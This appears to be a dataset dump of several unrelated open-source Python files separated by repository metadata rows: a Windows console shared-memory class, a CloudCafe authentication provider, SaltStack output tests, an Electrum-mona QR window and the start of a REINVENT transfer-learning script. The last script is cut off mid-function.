self.shm_key = 'mk' + str(time.time())
cmd_line = '%s "%s" %s %d %d %d %d %s' % (python_exe, communicator_py, self.shm_key, int(self.columns), int(self.lines), int(options['CODE_PAGE']), int(CONQUE_FAST_MODE), cmd)
flags = NORMAL_PRIORITY_CLASS | DETACHED_PROCESS | CREATE_UNICODE_ENVIRONMENT
si = STARTUPINFO()
pi = PROCESS_INFORMATION()
try:
res = ctypes.windll.kernel32.CreateProcessW(None, u(cmd_line), None, None, 0, flags, None, u('.'), ctypes.byref(si), ctypes.byref(pi))
except:
raise
self.pid = pi.dwProcessId
self.init_shared_memory(self.shm_key)
def read(self, start_line, num_lines, timeout=0):
if timeout > 0:
read_timeout = float(timeout) / 1000
time.sleep(read_timeout)
output = []
attributes = []
for i in range(start_line, start_line + num_lines + 1):
output.append(self.shm_output.read(self.columns, i * self.columns))
if not CONQUE_FAST_MODE:
attributes.append(self.shm_attributes.read(self.columns, i * self.columns))
return (output, attributes)
def get_stats(self):
try:
rescroll = self.shm_rescroll.read()
if rescroll != '' and rescroll != None:
self.shm_rescroll.clear()
self.shm_output.close()
self.shm_output = None
if not CONQUE_FAST_MODE:
self.shm_attributes.close()
self.shm_attributes = None
self.shm_output = ConqueSoleSharedMemory(CONQUE_SOLE_BUFFER_LENGTH * self.columns * rescroll['data']['blocks'], 'output', rescroll['data']['mem_key'], True)
self.shm_output.create('read')
if not CONQUE_FAST_MODE:
self.shm_attributes = ConqueSoleSharedMemory(CONQUE_SOLE_BUFFER_LENGTH * self.columns * rescroll['data']['blocks'], 'attributes', rescroll['data']['mem_key'], True, encoding='latin-1')
self.shm_attributes.create('read')
stats_str = self.shm_stats.read()
if stats_str != '':
self.stats = stats_str
else:
return False
except:
return False
return self.stats
def is_alive(self):
if not self.shm_stats:
return True
stats_str = self.shm_stats.read()
if stats_str:
return (stats_str['is_alive'])
else:
return True
def write(self, text):
self.bucket += text
istr = self.shm_input.read()
if istr == '':
self.shm_input.write(self.bucket[:500])
self.bucket = self.bucket[500:]
def write_vk(self, vk_code):
seq = u("\x1b[") + u(str(vk_code)) + u("VK")
self.write(seq)
def idle(self):
self.shm_command.write({'cmd': 'idle', 'data': {}})
def resume(self):
self.shm_command.write({'cmd': 'resume', 'data': {}})
def close(self):
self.shm_command.write({'cmd': 'close', 'data': {}})
time.sleep(0.2)
def window_resize(self, lines, columns):
self.lines = lines
if columns > self.columns:
self.columns = columns
self.shm_resize.write({'cmd': 'resize', 'data': {'width': columns, 'height': lines}})
def init_shared_memory(self, mem_key):
self.shm_input = ConqueSoleSharedMemory(CONQUE_SOLE_INPUT_SIZE, 'input', mem_key)
self.shm_input.create('write')
self.shm_input.clear()
self.shm_output = ConqueSoleSharedMemory(CONQUE_SOLE_BUFFER_LENGTH * self.columns, 'output', mem_key, True)
self.shm_output.create('write')
if not CONQUE_FAST_MODE:
self.shm_attributes = ConqueSoleSharedMemory(CONQUE_SOLE_BUFFER_LENGTH * self.columns, 'attributes', mem_key, True, encoding='latin-1')
self.shm_attributes.create('write')
self.shm_stats = ConqueSoleSharedMemory(CONQUE_SOLE_STATS_SIZE, 'stats', mem_key, serialize=True)
self.shm_stats.create('write')
self.shm_stats.clear()
self.shm_command = ConqueSoleSharedMemory(CONQUE_SOLE_COMMANDS_SIZE, 'command', mem_key, serialize=True)
self.shm_command.create('write')
self.shm_command.clear()
self.shm_resize = ConqueSoleSharedMemory(CONQUE_SOLE_RESIZE_SIZE, 'resize', mem_key, serialize=True)
self.shm_resize.create('write')
self.shm_resize.clear()
self.shm_rescroll = ConqueSoleSharedMemory(CONQUE_SOLE_RESCROLL_SIZE, 'rescroll', mem_key, serialize=True)
self.shm_rescroll.create('write')
self.shm_rescroll.clear()
return True
# vim:foldmethod=marker
| true | true |
1c334168306f7a6a86168569011754df1514469c | 7,674 | py | Python | cloudcafe/auth/provider.py | rcbops-qa/cloudcafe | d937f85496aadafbb94a330b9adb8ea18bee79ba | [
"Apache-2.0"
] | null | null | null | cloudcafe/auth/provider.py | rcbops-qa/cloudcafe | d937f85496aadafbb94a330b9adb8ea18bee79ba | [
"Apache-2.0"
] | null | null | null | cloudcafe/auth/provider.py | rcbops-qa/cloudcafe | d937f85496aadafbb94a330b9adb8ea18bee79ba | [
"Apache-2.0"
] | null | null | null | """
Copyright 2013 Rackspace
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from cafe.drivers.unittest.decorators import memoized
from cloudcafe.auth.config import UserAuthConfig, UserConfig
from cloudcafe.extensions.rax_auth.v2_0.tokens_api.client import \
TokenAPI_Client as RaxTokenAPI_Client, \
MFA_TokenAPI_Client as RaxToken_MFA_API_Client
from cloudcafe.extensions.rax_auth.v2_0.tokens_api.behaviors \
import TokenAPI_Behaviors as RaxTokenAPI_Behaviors, \
MFA_TokenAPI_Behaviors as RaxToken_MFA_API_Behaviors
from cloudcafe.extensions.saio_tempauth.v1_0.client import \
TempauthAPI_Client as SaioAuthAPI_Client
from cloudcafe.extensions.saio_tempauth.v1_0.behaviors import \
TempauthAPI_Behaviors as SaioAuthAPI_Behaviors
from cloudcafe.identity.v2_0.behaviors import IdentityServiceBehaviors
class MemoizedAuthServiceCompositeException(Exception):
pass
class MemoizedAuthServiceComposite(object):
def __init__(
self, service_name, region, endpoint_config=None,
user_config=None):
self.endpoint_config = endpoint_config or UserAuthConfig()
self.user_config = user_config or UserConfig()
self.service_name = service_name
self.region = region
@classmethod
@memoized
def get_rackspace_access_data(
cls, username, api_key, tenant_id, auth_endpoint):
client = RaxTokenAPI_Client(auth_endpoint, 'json', 'json')
behaviors = RaxTokenAPI_Behaviors(client)
return behaviors.get_access_data(username, api_key, tenant_id)
@classmethod
@memoized
def get_rackspace_mfa_access_data(
cls, username, password, tenant_id, auth_endpoint, passcode):
if passcode is None:
# TODO: This is a place holder for adding the functionality to
# use an external service (e.g. - SMS) to provide the passcode
# Also add this to get_access_data() in the AuthProvider class
pass
token_client = RaxToken_MFA_API_Client(
url=auth_endpoint, serialize_format='json',
deserialize_format='json')
token_behaviors = RaxToken_MFA_API_Behaviors(token_client)
return token_behaviors.get_access_data(
username=username, password=password, tenant_id=tenant_id)
@classmethod
@memoized
def get_keystone_access_data(
cls, username, password, tenant_name, auth_endpoint):
return IdentityServiceBehaviors.get_access_data(
username, password, tenant_name, auth_endpoint)
@classmethod
@memoized
def get_saio_tempauth_access_data(
cls, username, password, auth_endpoint):
client = SaioAuthAPI_Client(auth_endpoint)
behaviors = SaioAuthAPI_Behaviors(client)
return behaviors.get_access_data(username, password)
@property
def access_data(self):
if self.auth_strategy == 'keystone':
return self.get_keystone_access_data(
self.user_config.username, self.user_config.password,
self.user_config.tenant_name,
self.endpoint_config.auth_endpoint)
elif self.auth_strategy == 'rax_auth':
return self.get_rackspace_access_data(
self.user_config.username, self.user_config.api_key,
self.user_config.tenant_id, self.endpoint_config.auth_endpoint)
elif self.auth_strategy == 'rax_auth_mfa':
return self.get_rackspace_mfa_access_data(
self.user_config.username, self.user_config.password,
self.user_config.tenant_id, self.endpoint_config.auth_endpoint,
self.user_config.passcode)
elif self.auth_strategy == 'saio_tempauth':
return self.get_saio_tempauth_access_data(
self.user_config.username, self.user_config.password,
self.endpoint_config.auth_endpoint)
else:
raise NotImplementedError
@property
def auth_strategy(self):
return self.endpoint_config.strategy.lower()
@property
def token_id(self):
return self.access_data.token.id_
@property
def tenant_id(self):
return self.access_data.token.tenant.id_
@property
def public_url(self):
endpoint = self.service.get_endpoint(self.region)
try:
return endpoint.public_url
except AttributeError:
raise MemoizedAuthServiceCompositeException(
"Unable to locate an endpoint with the region '{0}' in the "
"service '{1}' from the service service catalog for user {2}. "
"No public URL found.".format(
self.region, self.service_name, self.tenant_id))
@property
def service(self):
service = self.access_data.get_service(self.service_name)
if not service:
raise MemoizedAuthServiceCompositeException(
"Unable to locate a service named '{0}' in the service catalog"
" for the user {1}".format(self.service_name, self.tenant_id))
return service
class AuthProvider(object):
@staticmethod
def get_access_data(endpoint_config=None, user_config=None):
endpoint_config = endpoint_config or UserAuthConfig()
user_config = user_config or UserConfig()
if endpoint_config.strategy.lower() == 'keystone':
return IdentityServiceBehaviors.get_access_data(
user_config.username, user_config.password,
user_config.tenant_name, endpoint_config.auth_endpoint)
elif endpoint_config.strategy.lower() == 'rax_auth':
token_client = RaxTokenAPI_Client(
endpoint_config.auth_endpoint, 'json', 'json')
token_behaviors = RaxTokenAPI_Behaviors(token_client)
return token_behaviors.get_access_data(user_config.username,
user_config.api_key,
user_config.tenant_id)
elif endpoint_config.strategy.lower() == 'rax_auth_mfa':
passcode = user_config.passcode
if passcode is None:
# TODO: This is a place holder for adding the functionality to
# use an external service (e.g. - SMS) to provide the passcode
pass
token_client = RaxToken_MFA_API_Client(
url=endpoint_config.auth_endpoint,
serialize_format='json', deserialize_format='json')
token_behaviors = RaxToken_MFA_API_Behaviors(token_client)
return token_behaviors.get_access_data(
username=user_config.username, password=user_config.password,
tenant_id=user_config.tenant_id, passcode=passcode)
elif endpoint_config.strategy.lower() == 'saio_tempauth':
auth_client = SaioAuthAPI_Client(endpoint_config.auth_endpoint)
auth_behaviors = SaioAuthAPI_Behaviors(auth_client)
return auth_behaviors.get_access_data(
user_config.username, user_config.password)
else:
raise NotImplementedError
| 40.603175 | 79 | 0.68061 | from cafe.drivers.unittest.decorators import memoized
from cloudcafe.auth.config import UserAuthConfig, UserConfig
from cloudcafe.extensions.rax_auth.v2_0.tokens_api.client import \
TokenAPI_Client as RaxTokenAPI_Client, \
MFA_TokenAPI_Client as RaxToken_MFA_API_Client
from cloudcafe.extensions.rax_auth.v2_0.tokens_api.behaviors \
import TokenAPI_Behaviors as RaxTokenAPI_Behaviors, \
MFA_TokenAPI_Behaviors as RaxToken_MFA_API_Behaviors
from cloudcafe.extensions.saio_tempauth.v1_0.client import \
TempauthAPI_Client as SaioAuthAPI_Client
from cloudcafe.extensions.saio_tempauth.v1_0.behaviors import \
TempauthAPI_Behaviors as SaioAuthAPI_Behaviors
from cloudcafe.identity.v2_0.behaviors import IdentityServiceBehaviors
class MemoizedAuthServiceCompositeException(Exception):
pass
class MemoizedAuthServiceComposite(object):
def __init__(
self, service_name, region, endpoint_config=None,
user_config=None):
self.endpoint_config = endpoint_config or UserAuthConfig()
self.user_config = user_config or UserConfig()
self.service_name = service_name
self.region = region
@classmethod
@memoized
def get_rackspace_access_data(
cls, username, api_key, tenant_id, auth_endpoint):
client = RaxTokenAPI_Client(auth_endpoint, 'json', 'json')
behaviors = RaxTokenAPI_Behaviors(client)
return behaviors.get_access_data(username, api_key, tenant_id)
@classmethod
@memoized
def get_rackspace_mfa_access_data(
cls, username, password, tenant_id, auth_endpoint, passcode):
if passcode is None:
pass
token_client = RaxToken_MFA_API_Client(
url=auth_endpoint, serialize_format='json',
deserialize_format='json')
token_behaviors = RaxToken_MFA_API_Behaviors(token_client)
return token_behaviors.get_access_data(
username=username, password=password, tenant_id=tenant_id)
@classmethod
@memoized
def get_keystone_access_data(
cls, username, password, tenant_name, auth_endpoint):
return IdentityServiceBehaviors.get_access_data(
username, password, tenant_name, auth_endpoint)
@classmethod
@memoized
def get_saio_tempauth_access_data(
cls, username, password, auth_endpoint):
client = SaioAuthAPI_Client(auth_endpoint)
behaviors = SaioAuthAPI_Behaviors(client)
return behaviors.get_access_data(username, password)
@property
def access_data(self):
if self.auth_strategy == 'keystone':
return self.get_keystone_access_data(
self.user_config.username, self.user_config.password,
self.user_config.tenant_name,
self.endpoint_config.auth_endpoint)
elif self.auth_strategy == 'rax_auth':
return self.get_rackspace_access_data(
self.user_config.username, self.user_config.api_key,
self.user_config.tenant_id, self.endpoint_config.auth_endpoint)
elif self.auth_strategy == 'rax_auth_mfa':
return self.get_rackspace_mfa_access_data(
self.user_config.username, self.user_config.password,
self.user_config.tenant_id, self.endpoint_config.auth_endpoint,
self.user_config.passcode)
elif self.auth_strategy == 'saio_tempauth':
return self.get_saio_tempauth_access_data(
self.user_config.username, self.user_config.password,
self.endpoint_config.auth_endpoint)
else:
raise NotImplementedError
@property
def auth_strategy(self):
return self.endpoint_config.strategy.lower()
@property
def token_id(self):
return self.access_data.token.id_
@property
def tenant_id(self):
return self.access_data.token.tenant.id_
@property
def public_url(self):
endpoint = self.service.get_endpoint(self.region)
try:
return endpoint.public_url
except AttributeError:
raise MemoizedAuthServiceCompositeException(
"Unable to locate an endpoint with the region '{0}' in the "
"service '{1}' from the service service catalog for user {2}. "
"No public URL found.".format(
self.region, self.service_name, self.tenant_id))
@property
def service(self):
service = self.access_data.get_service(self.service_name)
if not service:
raise MemoizedAuthServiceCompositeException(
"Unable to locate a service named '{0}' in the service catalog"
" for the user {1}".format(self.service_name, self.tenant_id))
return service
class AuthProvider(object):
@staticmethod
def get_access_data(endpoint_config=None, user_config=None):
endpoint_config = endpoint_config or UserAuthConfig()
user_config = user_config or UserConfig()
if endpoint_config.strategy.lower() == 'keystone':
return IdentityServiceBehaviors.get_access_data(
user_config.username, user_config.password,
user_config.tenant_name, endpoint_config.auth_endpoint)
elif endpoint_config.strategy.lower() == 'rax_auth':
token_client = RaxTokenAPI_Client(
endpoint_config.auth_endpoint, 'json', 'json')
token_behaviors = RaxTokenAPI_Behaviors(token_client)
return token_behaviors.get_access_data(user_config.username,
user_config.api_key,
user_config.tenant_id)
elif endpoint_config.strategy.lower() == 'rax_auth_mfa':
passcode = user_config.passcode
if passcode is None:
pass
token_client = RaxToken_MFA_API_Client(
url=endpoint_config.auth_endpoint,
serialize_format='json', deserialize_format='json')
token_behaviors = RaxToken_MFA_API_Behaviors(token_client)
return token_behaviors.get_access_data(
username=user_config.username, password=user_config.password,
tenant_id=user_config.tenant_id, passcode=passcode)
elif endpoint_config.strategy.lower() == 'saio_tempauth':
auth_client = SaioAuthAPI_Client(endpoint_config.auth_endpoint)
auth_behaviors = SaioAuthAPI_Behaviors(auth_client)
return auth_behaviors.get_access_data(
user_config.username, user_config.password)
else:
raise NotImplementedError
| true | true |
1c3342a0fa5ffa4a0acc71147447042416e8f56a | 6,635 | py | Python | tests/integration/output/test_output.py | yuriks/salt | d2a5bd8adddb98ec1718d79384aa13b4f37e8028 | [
"Apache-2.0",
"MIT"
] | 1 | 2020-03-31T22:51:16.000Z | 2020-03-31T22:51:16.000Z | tests/integration/output/test_output.py | yuriks/salt | d2a5bd8adddb98ec1718d79384aa13b4f37e8028 | [
"Apache-2.0",
"MIT"
] | null | null | null | tests/integration/output/test_output.py | yuriks/salt | d2a5bd8adddb98ec1718d79384aa13b4f37e8028 | [
"Apache-2.0",
"MIT"
] | 1 | 2021-09-30T07:00:01.000Z | 2021-09-30T07:00:01.000Z | # -*- coding: utf-8 -*-
'''
:codeauthor: Nicole Thomas <nicole@saltstack.com>
'''
# Import Salt Libs
from __future__ import absolute_import, print_function, unicode_literals
import os
import traceback
# Import Salt Testing Libs
from tests.support.case import ShellCase
from tests.support.mixins import RUNTIME_VARS
# Import Salt libs
import salt.config
import salt.utils.yaml
from salt.output import display_output
from salt.ext import six
class OutputReturnTest(ShellCase):
'''
Integration tests to ensure outputters return their expected format.
Tests against situations where the loader might not be returning the
right outputter even though it was explicitly requested.
'''
def test_output_json(self):
'''
Tests the return of json-formatted data
'''
ret = self.run_call('test.ping --out=json')
self.assertIn('{', ret)
self.assertIn('"local": true', ''.join(ret))
self.assertIn('}', ''.join(ret))
def test_output_nested(self):
'''
Tests the return of nested-formatted data
'''
expected = ['local:', ' True']
ret = self.run_call('test.ping --out=nested')
self.assertEqual(ret, expected)
def test_output_quiet(self):
'''
Tests the return of an out=quiet query
'''
expected = []
ret = self.run_call('test.ping --out=quiet')
self.assertEqual(ret, expected)
def test_output_pprint(self):
'''
Tests the return of pprint-formatted data
'''
expected = ["{u'local': True}"] if six.PY2 else ["{'local': True}"]
ret = self.run_call('test.ping --out=pprint')
self.assertEqual(ret, expected)
def test_output_raw(self):
'''
Tests the return of raw-formatted data
'''
expected = ["{u'local': True}"] if six.PY2 else ["{'local': True}"]
ret = self.run_call('test.ping --out=raw')
self.assertEqual(ret, expected)
def test_output_txt(self):
'''
Tests the return of txt-formatted data
'''
expected = ['local: True']
ret = self.run_call('test.ping --out=txt')
self.assertEqual(ret, expected)
def test_output_yaml(self):
'''
Tests the return of yaml-formatted data
'''
expected = ['local: true']
ret = self.run_call('test.ping --out=yaml')
self.assertEqual(ret, expected)
def test_output_yaml_namespaced_dict_wrapper(self):
'''
Tests the ability to dump a NamespacedDictWrapper instance, as used in
magic dunders like __grains__ and __pillar__
See https://github.com/saltstack/salt/issues/49269
'''
dumped_yaml = '\n'.join(self.run_call('grains.items --out=yaml'))
loaded_yaml = salt.utils.yaml.safe_load(dumped_yaml)
# We just want to check that the dumped YAML loades as a dict with a
# single top-level key, we don't care about the real contents.
assert isinstance(loaded_yaml, dict)
assert list(loaded_yaml) == ['local']
def test_output_unicodebad(self):
'''
Tests outputter reliability with utf8
'''
opts = salt.config.minion_config(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'minion'))
opts['output_file'] = os.path.join(
RUNTIME_VARS.TMP,
'outputtest'
)
data = {'foo': {'result': False,
'aaa': 'azerzaeréééé',
'comment': u'ééééàààà'}}
try:
# this should not raises UnicodeEncodeError
display_output(data, opts=opts)
except Exception: # pylint: disable=broad-except
# display trace in error message for debugging on jenkins
trace = traceback.format_exc()
sentinel = object()
old_max_diff = getattr(self, 'maxDiff', sentinel)
try:
self.maxDiff = None
self.assertEqual(trace, '')
finally:
if old_max_diff is sentinel:
delattr(self, 'maxDiff')
else:
self.maxDiff = old_max_diff
def test_output_highstate(self):
'''
Regression tests for the highstate outputter. Calls a basic state with various
flags. Each comparison should be identical when successful.
'''
# Test basic highstate output. No frills.
expected = ['minion:', ' ID: simple-ping', ' Function: module.run',
' Name: test.ping', ' Result: True',
' Comment: Module function test.ping executed',
' Changes: ', ' ret:', ' True',
'Summary for minion', 'Succeeded: 1 (changed=1)', 'Failed: 0',
'Total states run: 1']
state_run = self.run_salt('"minion" state.sls simple-ping')
for expected_item in expected:
self.assertIn(expected_item, state_run)
# Test highstate output while also passing --out=highstate.
# This is a regression test for Issue #29796
state_run = self.run_salt('"minion" state.sls simple-ping --out=highstate')
for expected_item in expected:
self.assertIn(expected_item, state_run)
# Test highstate output when passing --static and running a state function.
# See Issue #44556.
state_run = self.run_salt('"minion" state.sls simple-ping --static')
for expected_item in expected:
self.assertIn(expected_item, state_run)
# Test highstate output when passing --static and --out=highstate.
# See Issue #44556.
state_run = self.run_salt('"minion" state.sls simple-ping --static --out=highstate')
for expected_item in expected:
self.assertIn(expected_item, state_run)
def test_output_highstate_falls_back_nested(self):
'''
Tests outputter when passing --out=highstate with a non-state call. This should
fall back to "nested" output.
'''
expected = ['minion:', ' True']
ret = self.run_salt('"minion" test.ping --out=highstate')
self.assertEqual(ret, expected)
def test_static_simple(self):
'''
Tests passing the --static option with a basic test.ping command. This
should be the "nested" output.
'''
expected = ['minion:', ' True']
ret = self.run_salt('"minion" test.ping --static')
self.assertEqual(ret, expected)
| 36.059783 | 92 | 0.592766 |
from __future__ import absolute_import, print_function, unicode_literals
import os
import traceback
from tests.support.case import ShellCase
from tests.support.mixins import RUNTIME_VARS
import salt.config
import salt.utils.yaml
from salt.output import display_output
from salt.ext import six
class OutputReturnTest(ShellCase):
def test_output_json(self):
ret = self.run_call('test.ping --out=json')
self.assertIn('{', ret)
self.assertIn('"local": true', ''.join(ret))
self.assertIn('}', ''.join(ret))
def test_output_nested(self):
expected = ['local:', ' True']
ret = self.run_call('test.ping --out=nested')
self.assertEqual(ret, expected)
def test_output_quiet(self):
expected = []
ret = self.run_call('test.ping --out=quiet')
self.assertEqual(ret, expected)
def test_output_pprint(self):
expected = ["{u'local': True}"] if six.PY2 else ["{'local': True}"]
ret = self.run_call('test.ping --out=pprint')
self.assertEqual(ret, expected)
def test_output_raw(self):
expected = ["{u'local': True}"] if six.PY2 else ["{'local': True}"]
ret = self.run_call('test.ping --out=raw')
self.assertEqual(ret, expected)
def test_output_txt(self):
expected = ['local: True']
ret = self.run_call('test.ping --out=txt')
self.assertEqual(ret, expected)
def test_output_yaml(self):
expected = ['local: true']
ret = self.run_call('test.ping --out=yaml')
self.assertEqual(ret, expected)
def test_output_yaml_namespaced_dict_wrapper(self):
dumped_yaml = '\n'.join(self.run_call('grains.items --out=yaml'))
loaded_yaml = salt.utils.yaml.safe_load(dumped_yaml)
assert isinstance(loaded_yaml, dict)
assert list(loaded_yaml) == ['local']
def test_output_unicodebad(self):
opts = salt.config.minion_config(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'minion'))
opts['output_file'] = os.path.join(
RUNTIME_VARS.TMP,
'outputtest'
)
data = {'foo': {'result': False,
'aaa': 'azerzaeréééé',
'comment': u'ééééàààà'}}
try:
# this should not raises UnicodeEncodeError
display_output(data, opts=opts)
except Exception: # pylint: disable=broad-except
# display trace in error message for debugging on jenkins
trace = traceback.format_exc()
sentinel = object()
old_max_diff = getattr(self, 'maxDiff', sentinel)
try:
self.maxDiff = None
self.assertEqual(trace, '')
finally:
if old_max_diff is sentinel:
delattr(self, 'maxDiff')
else:
self.maxDiff = old_max_diff
def test_output_highstate(self):
# Test basic highstate output. No frills.
expected = ['minion:', ' ID: simple-ping', ' Function: module.run',
' Name: test.ping', ' Result: True',
' Comment: Module function test.ping executed',
' Changes: ', ' ret:', ' True',
'Summary for minion', 'Succeeded: 1 (changed=1)', 'Failed: 0',
'Total states run: 1']
state_run = self.run_salt('"minion" state.sls simple-ping')
for expected_item in expected:
self.assertIn(expected_item, state_run)
# Test highstate output while also passing --out=highstate.
# This is a regression test for Issue #29796
state_run = self.run_salt('"minion" state.sls simple-ping --out=highstate')
for expected_item in expected:
self.assertIn(expected_item, state_run)
# Test highstate output when passing --static and running a state function.
# See Issue #44556.
state_run = self.run_salt('"minion" state.sls simple-ping --static')
for expected_item in expected:
self.assertIn(expected_item, state_run)
# Test highstate output when passing --static and --out=highstate.
# See Issue #44556.
state_run = self.run_salt('"minion" state.sls simple-ping --static --out=highstate')
for expected_item in expected:
self.assertIn(expected_item, state_run)
def test_output_highstate_falls_back_nested(self):
expected = ['minion:', ' True']
ret = self.run_salt('"minion" test.ping --out=highstate')
self.assertEqual(ret, expected)
def test_static_simple(self):
expected = ['minion:', ' True']
ret = self.run_salt('"minion" test.ping --static')
self.assertEqual(ret, expected)
| true | true |
1c3344b206e7fa14a4a0cf6e031ac64c55973a92 | 1,753 | py | Python | electrum_mona/gui/qt/qrwindow.py | zcore-dev/electrum-mona | 2beb0c9c7794e8b03d1725bae41ee8b792c57275 | [
"MIT"
] | null | null | null | electrum_mona/gui/qt/qrwindow.py | zcore-dev/electrum-mona | 2beb0c9c7794e8b03d1725bae41ee8b792c57275 | [
"MIT"
] | null | null | null | electrum_mona/gui/qt/qrwindow.py | zcore-dev/electrum-mona | 2beb0c9c7794e8b03d1725bae41ee8b792c57275 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2014 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QHBoxLayout, QWidget
from .qrcodewidget import QRCodeWidget
from electrum_mona.i18n import _
class QR_Window(QWidget):
def __init__(self, win):
QWidget.__init__(self)
self.win = win
self.setWindowTitle('Electrum - '+_('Payment Request'))
self.setMinimumSize(800, 800)
self.setFocusPolicy(Qt.NoFocus)
main_box = QHBoxLayout()
self.qrw = QRCodeWidget()
main_box.addWidget(self.qrw, 1)
self.setLayout(main_box)
| 38.108696 | 71 | 0.725613 |
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QHBoxLayout, QWidget
from .qrcodewidget import QRCodeWidget
from electrum_mona.i18n import _
class QR_Window(QWidget):
def __init__(self, win):
QWidget.__init__(self)
self.win = win
self.setWindowTitle('Electrum - '+_('Payment Request'))
self.setMinimumSize(800, 800)
self.setFocusPolicy(Qt.NoFocus)
main_box = QHBoxLayout()
self.qrw = QRCodeWidget()
main_box.addWidget(self.qrw, 1)
self.setLayout(main_box)
| true | true |
1c3344d6bd423d534da455d71038b44401ebed57 | 3,849 | py | Python | transfer_learn_model.py | MauriceKarrenbrock/reinvent-memory | 57860dabb6534daf14fe2ab81d57589a90760442 | [
"MIT"
] | null | null | null | transfer_learn_model.py | MauriceKarrenbrock/reinvent-memory | 57860dabb6534daf14fe2ab81d57589a90760442 | [
"MIT"
] | null | null | null | transfer_learn_model.py | MauriceKarrenbrock/reinvent-memory | 57860dabb6534daf14fe2ab81d57589a90760442 | [
"MIT"
] | null | null | null | # coding=utf-8
import argparse
import logging
from typing import List
import numpy as np
import torch
from rdkit import Chem
from rdkit import rdBase
from torch.utils.data import DataLoader
from tqdm import tqdm
import models.reinvent
from chem import smiles
from models.reinvent.dataset import Dataset
from utils import decrease_learning_rate
from train_model import train
rdBase.DisableLog('rdApp.error')
def save_model(model, model_path, epoch, save_each_epoch):
model.checkpoint()
path = model_path
if save_each_epoch:
path += ".{}".format(epoch)
model.save(path)
def main():
parser = argparse.ArgumentParser(description="Performs transfer learning of a model on a SMILES file")
parser.add_argument("--input-model", '-i', help='Prior model file',
type=str, required=True)
parser.add_argument("--output-model", '-o', help='Path to the output model',
type=str, required=True)
parser.add_argument("--input-smiles", '-s', help='Path to the SMILES file',
type=str, required=True)
parser.add_argument("--standardize-smiles", help='Set if want to standardize the SMILES using RDKIT',
action="store_true", default=False)
parser.add_argument("--save-each-epoch", help="Set to save each epoch in a different model file.",
action="store_true", default=False)
parser.add_argument("--steps-to-change-lr", "--sclr", help="Number of steps to change learning rate", type=int,
default=500)
parser.add_argument("--lr-change", "--lrc", help="Ratio which the learning rate is changed", type=float,
default=0.01)
parser.add_argument("--epochs", help="Number of epochs to train [DEFAULT: 20]", type=int, default=20)
parser.add_argument("--batch-size", help="Number of molecules processed per batch [DEFAULT: 128]", type=int,
default=128)
parser.add_argument("--lr", help="Learning rate for training [DEFAULT: 0.0005]", type=float, default=0.0005)
parser.add_argument("--patience",
help=("Number of steps where the training get stopped if no loss improvement is noticed. "
"[DEFAULT: 30000]"),
type=int, default=30000)
parser.add_argument("--temperature", "-t",
help=("Temperature for the sequence sampling. Has to be larger than 0. Values below 1 make "
"the RNN more confident in it's generation, but also more conservative. "
"Values larger than 1 result in more random sequences. [DEFAULT: 1.0]"),
type=float, default=1.0)
args = parser.parse_args()
# setup the logger to get a nice output
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s: %(module)s.%(funcName)s +%(lineno)s: %(levelname)-8s %(message)s',
datefmt='%H:%M:%S'
)
model = models.reinvent.Model.load_from_file(args.input_model)
logging.info("Reading smiles...")
with open(args.input_smiles, 'r') as f:
lines = [line.strip().split()[0] for line in f]
logging.info("Read {} lines".format(len(lines)))
if args.standardize_smiles:
logging.info("Standardize SMILES")
smiles_list = smiles.standardize_smiles_list(lines)
else:
smiles_list = lines
train(model, smiles_list, model_path=args.output_model, epochs=args.epochs, batch_size=args.batch_size,
lr=args.lr, patience=args.patience, save_each_epoch=args.save_each_epoch,
steps_to_change_lr=args.steps_to_change_lr, lr_change=args.lr_change, temperature=args.temperature)
if __name__ == "__main__":
main()
| 43.738636 | 116 | 0.637049 |
import argparse
import logging
from typing import List
import numpy as np
import torch
from rdkit import Chem
from rdkit import rdBase
from torch.utils.data import DataLoader
from tqdm import tqdm
import models.reinvent
from chem import smiles
from models.reinvent.dataset import Dataset
from utils import decrease_learning_rate
from train_model import train
rdBase.DisableLog('rdApp.error')
def save_model(model, model_path, epoch, save_each_epoch):
model.checkpoint()
path = model_path
if save_each_epoch:
path += ".{}".format(epoch)
model.save(path)
def main():
parser = argparse.ArgumentParser(description="Performs transfer learning of a model on a SMILES file")
parser.add_argument("--input-model", '-i', help='Prior model file',
type=str, required=True)
parser.add_argument("--output-model", '-o', help='Path to the output model',
type=str, required=True)
parser.add_argument("--input-smiles", '-s', help='Path to the SMILES file',
type=str, required=True)
parser.add_argument("--standardize-smiles", help='Set if want to standardize the SMILES using RDKIT',
action="store_true", default=False)
parser.add_argument("--save-each-epoch", help="Set to save each epoch in a different model file.",
action="store_true", default=False)
parser.add_argument("--steps-to-change-lr", "--sclr", help="Number of steps to change learning rate", type=int,
default=500)
parser.add_argument("--lr-change", "--lrc", help="Ratio which the learning rate is changed", type=float,
default=0.01)
